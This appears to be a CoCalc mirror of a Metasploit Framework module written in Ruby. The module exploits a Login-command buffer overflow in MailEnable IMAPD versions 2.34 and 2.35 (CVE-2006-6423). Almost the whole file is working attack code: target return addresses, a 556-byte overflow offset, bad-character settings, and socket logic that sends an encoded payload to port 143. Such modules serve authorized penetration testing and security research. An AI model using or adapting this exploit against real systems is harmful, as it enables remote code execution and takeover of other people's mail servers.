Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/imap/mailenable_login.rb
19637 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow',

16
        'Description' => %q{

17
          MailEnable's IMAP server contains a buffer overflow

18
          vulnerability in the Login command.

19
        },

20
        'Author' => [ 'MC' ],

21
        'License' => MSF_LICENSE,

22
        'References' => [

23
          [ 'CVE', '2006-6423'],

24
          [ 'OSVDB', '32125'],

25
          [ 'BID', '21492']

26
        ],

27
        'Privileged' => true,

28
        'DefaultOptions' => {

29
          'EXITFUNC' => 'thread',

30
        },

31
        'Payload' => {

32
          'Space' => 450,

33
          'BadChars' => "\x00\x0a\x0d\x20",

34
          'StackAdjustment' => -3500,

35
        },

36
        'Platform' => 'win',

37
        'Targets' => [

38


39
          [

40
            'MailEnable 2.35 Pro',

41
            {

42
              'Ret' => 0x10049abb,

43
            }

44
          ], # MEAISP.DLL

45


46
          [

47
            'MailEnable 2.34 Pro',

48
            {

49
              'Ret' => 0x76095d68,

50
              'Offset' => 556,

51
            }

52
          ], # push esp #  ret  | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll]

53
        ],

54
        'DisclosureDate' => '2006-12-11',

55
        'DefaultTarget' => 0,

56
        'Notes' => {

57
          'Reliability' => UNKNOWN_RELIABILITY,

58
          'Stability' => UNKNOWN_STABILITY,

59
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

60
        }

61
      )

62
    )

63


64
    register_options([ Opt::RPORT(143) ])

65
  end

66


67
  def exploit

68
    connect

69


70
    auth = "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n"

71
    sploit	= rand_text_alpha_upper(556) + [target.ret].pack('V')

72
    sploit	<< payload.encoded + "\r\n\r\n"

73


74
    res = sock.recv(50)

75
    if (res =~ / OK IMAP4rev1/)

76
      print_status("Trying target #{target.name}...")

77
      sock.put(auth)

78
      sock.get_once(-1, 3)

79
      sock.put(sploit)

80
    else

81
      print_status("Not running IMAP4rev1...")

82
    end

83


84
    handler

85
    disconnect

86
  end

87
end

88


89